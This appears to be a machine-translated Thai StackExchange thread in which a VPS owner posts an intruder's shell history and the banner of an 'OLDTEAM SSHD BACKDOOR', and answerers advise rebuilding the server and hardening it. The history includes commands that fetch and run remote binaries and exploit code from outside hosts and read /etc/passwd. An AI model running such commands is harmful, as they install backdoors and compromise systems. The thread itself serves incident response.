พบ SSH Backdoor บน VServer จะทำอย่างไร?

24

เมื่อวานนี้ฉันตรวจสอบประวัติคำสั่งของฉันใน VServer ของฉัน ฉันพบหลายสายที่น่าสงสัย

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

โดยเฉพาะอย่างยิ่ง sniffer.tgz ทำให้ฉันตกใจ ฉันตั้งค่าเครื่องเสมือนและดาวน์โหลดไฟล์เก็บถาวร tgz นี้ ฉันเริ่มการติดตั้งและมันทำให้ฉันมีบรรทัดเหล่านี้:

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

ไม่มีใครรู้วิธีลบสิ่งนี้หรือไม่

ssh security malware

— itskajo
แหล่งที่มา

8

ที่เกี่ยวข้อง: serverfault.com/questions/218005/… , security.stackexchange.com/questions/24195/…

— ทำเครื่องหมาย

66

นี่คือสิ่งที่คุณควรทำในทุกระบบที่คุณมีsniffer.tgz: Nuke Them From Orbit ทันทีและเริ่มต้นใหม่จากการติดตั้งใหม่ทั้งหมด (นั่นคือทำลายระบบติดตั้งใหม่ทั้งหมดทำความสะอาดโหลดข้อมูลจากข้อมูลสำรองที่สะอาด - สมมติว่าคุณมีข้อมูลสำรองที่สะอาดแล้วทำให้ระบบแข็งตัวก่อนนำกลับสู่อินเทอร์เน็ต)

เมื่อใดก็ตามที่คุณมีมัลแวร์หรือแฮ็กเกอร์เข้าสู่ระบบของคุณเช่นนี้ก็ถึงเวลาที่จะวิเคราะห์ว่าระบบของคุณได้รับการกำหนดค่าใหม่อีกครั้งและตรวจสอบให้แน่ใจว่าไม่ได้ทำซ้ำขั้นตอนเดิมที่ทำ แต่เนื่องจากนี่อาจไม่ใช่ระบบที่คุณมีความสามารถในการวิเคราะห์และวิเคราะห์ทางนิติเวชและเนื่องจากนี่อาจเป็นเซิร์ฟเวอร์เดียวของคุณถึงเวลาที่จะทำลายระบบเสมือนและเริ่มต้นใหม่ตั้งแต่ต้น (ดังที่ฉันได้กล่าวไว้ข้างต้น)

(และสิ่งนี้ใช้กับสถานการณ์ใด ๆ ที่คุณได้รับมัลแวร์ในระบบยกเว้นว่าคุณมีฮาร์ดแวร์สำรองที่จะเปลี่ยนบางอย่างเช่นนี้เพื่อให้คุณสามารถแยกและตรวจสอบระบบที่ใช้ช่องโหว่ซึ่งโดยทั่วไปผู้ใช้ส่วนใหญ่ไม่มี เพื่อทำระบบและเริ่มต้นใหม่)

หากไม่มีการวิเคราะห์เซิร์ฟเวอร์ของคุณฉันไม่สามารถพูดสิ่งที่คุณทำผิดได้ แต่เป็นไปได้ว่าแบ็คดอร์ตัวนี้จะลึกเข้าไปในระบบมากกว่าแค่ 'โปรแกรม' ธรรมดาที่ติดตั้งไว้ และเนื่องจากผู้ร้ายได้ทำการติดตั้งแบ็คดอร์ในระบบของคุณแล้วคุณสามารถสันนิษฐานได้ว่าตอนนี้รหัสผ่านทั้งหมดของคุณถูกละเมิดและไม่ปลอดภัยอีกต่อไป (ไม่ว่าจะเป็น SSH หรือรูท MySQL หรือรหัสผ่านประเภทอื่น ๆ ที่เคย ถูกป้อนเข้าสู่ระบบคอมพิวเตอร์นี้) ถึงเวลาเปลี่ยนรหัสผ่านทั้งหมดของคุณ!

เมื่อคุณสำรองข้อมูลในสภาพแวดล้อมที่สะอาดแล้วต่อไปนี้เป็นคำแนะนำพื้นฐานในการพิจารณาขั้นตอนการชุบแข็ง โปรดทราบว่าเนื่องจากสิ่งเหล่านี้ทำให้หัวข้อกว้างขวางยิ่งขึ้นฉันไม่สามารถเจาะลึกรายละเอียดได้ที่นี่ แต่ถึงเวลาต้องทำตามขั้นตอนการชุบแข็งเพื่อปกป้องระบบของคุณ:

เปิดไฟร์วอลล์และอนุญาตการเข้าถึงพอร์ตที่จำเป็นต้องเปิดเท่านั้น ufwมีอยู่ที่จะง่ายดังนั้นลองใช้มันดู sudo ufw enable. (การกำหนดค่าufwอย่างถูกต้องสำหรับสภาพแวดล้อมของคุณเป็นเรื่องราวที่แตกต่างกันและอยู่นอกเหนือขอบเขตของคำถามนี้)
จำกัด การเข้าถึงระยะไกล SSH สิ่งนี้ไม่สามารถทำได้เสมอไป แต่คุณควรระบุที่อยู่ IP ที่คุณเป็นเจ้าของและควรอยู่ในรายการที่ปลอดภัยโดยเฉพาะในไฟร์วอลล์ (หากคุณอยู่ในที่อยู่อาศัยแบบไดนามิกข้ามขั้นตอนนี้)
ล็อคการเข้าถึง SSH ไปยังเซิร์ฟเวอร์ของคุณและจำเป็นต้องใช้คีย์ SSH สำหรับการตรวจสอบสิทธิ์เท่านั้น วิธีนี้แฮกเกอร์ไม่สามารถโจมตีเซิร์ฟเวอร์ของคุณและลองและเดารหัสผ่าน มันยากมากที่จะคาดเดาคีย์ส่วนตัวที่เหมาะสม (เพราะคุณต้องทำให้พวกมันดุร้าย) และสิ่งนี้จะช่วยป้องกันการโจมตีที่ดุร้าย
หากคุณกำลังใช้งานเว็บไซต์ที่ให้แน่ใจว่าจะลงล็อคสิทธิ์เพื่อให้ประชาชนที่ไม่สามารถอัปโหลด / ดำเนินการสิ่งที่พักผ่อนของพวกเขา การทำเช่นนี้แตกต่างกันไปในแต่ละไซต์ดังนั้นฉันจึงไม่สามารถให้คำแนะนำเพิ่มเติมได้ที่นี่ (เป็นไปไม่ได้ที่จะทำเช่นนั้น)
นอกจากนี้ถ้าคุณกำลังใช้งานเว็บไซต์ที่ใช้ Joomla หรือ Wordpress หรือดังกล่าวให้แน่ใจว่าคุณรักษาสิ่งแวดล้อมได้ถึงวันที่และปะกับช่องโหว่ความปลอดภัยจากผู้ให้บริการซอฟแวร์
ที่เป็นไปได้ในการติดตั้งกำหนดค่าและการตรวจสอบการใช้งานสองปัจจัย (2FA) วิธีการสำหรับสิ่งที่คุณตรวจสอบกับ มีวิธีแก้ปัญหาสำหรับการรับรองความถูกต้องของปัจจัยที่สองสำหรับแอปพลิเคชันที่แตกต่างกันและการรักษาความปลอดภัยแอปพลิเคชันต่าง ๆ ด้วยวิธีนี้อยู่นอกเหนือขอบเขตของโพสต์นี้ดังนั้นคุณควรทำวิจัยของคุณ
หากคุณต้องใช้รหัสผ่านในการตั้งค่าของคุณให้ใช้ตัวจัดการรหัสผ่านที่เหมาะสม (ตัวเลือก Cloud-Based ไม่จำเป็นต้องเป็นตัวเลือกที่ดี) และใช้ความยาวยาว (25+ ตัวอักษร) สุ่มรหัสผ่านที่ไม่น่าจดจำซึ่งแตกต่างกันไป ปลอดภัยด้วยรหัสผ่าน (ดังนั้นคำแนะนำสำหรับตัวจัดการรหัสผ่าน) (อย่างไรก็ตามคุณควรพิจารณาอย่างยิ่งว่าจะไม่ใช้รหัสผ่านหากเป็นไปได้ (เช่นสำหรับการตรวจสอบความถูกต้องของ SSH) และใช้ 2FA หากเป็นไปได้)

— โทมัสวอร์ด
แหล่งที่มา

ความคิดเห็นไม่ได้มีไว้สำหรับการอภิปรายเพิ่มเติม การสนทนานี้ได้รับการย้ายไปแชท

— terdon

ฉันยอมรับคำตอบเพราะนี่คือสิ่งที่ฉันจะทำ ฉันจะพยายามปิด Backdoor ที่ VM เพื่อผลประโยชน์ส่วนตัวของฉัน

— itskajo

0

หากมีหนึ่งแบ็คดอร์มีอีก 3 แยก, สำรองข้อมูล, จัดการมันและกู้คืนข้อมูลอย่างระมัดระวังระวัง cron's, php หรือแม้แต่ข้อมูล mysql ใด ๆ พวกเขาทั้งหมดอาจถูกบุกรุก โปรดจำไว้ว่า ณ จุดนี้พวกเขามีรหัสผ่านและแฮชทั้งหมดของคุณดังนั้นหากคุณกำหนดค่าเครื่องอื่นในทำนองเดียวกันพวกเขาอาจแฮ็กพวกนั้นด้วย ... ส่วนที่ยากคือการหาวิธีเริ่มต้นด้วย หากคุณมี WordPress มองหามัลแวร์ในปลั๊กอิน / ธีม ฯลฯ ... ตรวจสอบสิทธิ์ของคุณคุณอาจมี 777 ทุกที่ ไม่มีคำตอบง่ายๆคุณกำลังดูงานมาก

— โทนี่เลสเตอร์
แหล่งที่มา

ไม่จำเป็นต้องมีมากกว่าหนึ่งอย่างอย่างไรก็ตามบ่อยครั้งหรืออาจเป็นไปได้ว่าอาจไม่เป็นอย่างนั้น และพวกเขาอาจไม่มีรหัสผ่านทั้งหมดอย่างแน่นอน หรือเป็น "น่าจะเป็น" ที่พวกเขาแฮ็กเครื่องอื่นคุณไม่ทราบถึงความตั้งใจของพวกเขาหรือสิ่งที่ถูกดมกลิ่นหรือหากโปรแกรมที่ไม่ดีถูกเปิดใช้งานเกินกว่าที่มีอยู่หรือวิ่งในบางลักษณะ และ "กู้คืนข้อมูลอย่างระมัดระวัง" เป็นคำแนะนำทั่วไปสำหรับสิ่งที่ต้องดำเนินการอย่างพิถีพิถัน

— James